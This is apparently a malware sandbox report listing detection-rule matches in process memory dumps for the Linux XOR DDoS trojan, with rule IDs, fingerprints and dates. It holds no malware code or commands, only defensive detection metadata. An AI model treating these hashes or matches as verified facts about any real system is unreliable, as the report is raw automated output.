Source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6525.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6525.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6525.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6525.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6525.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6525.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6347.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6347.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6347.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6347.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6347.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6347.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6361.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6361.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6361.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6361.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6361.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6361.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6273.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6273.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6273.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6273.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6273.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6273.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6486.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6486.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6486.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6486.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6486.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6486.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6448.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6448.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6448.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6448.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6448.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6448.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6511.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6511.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6511.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6511.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6511.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6511.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
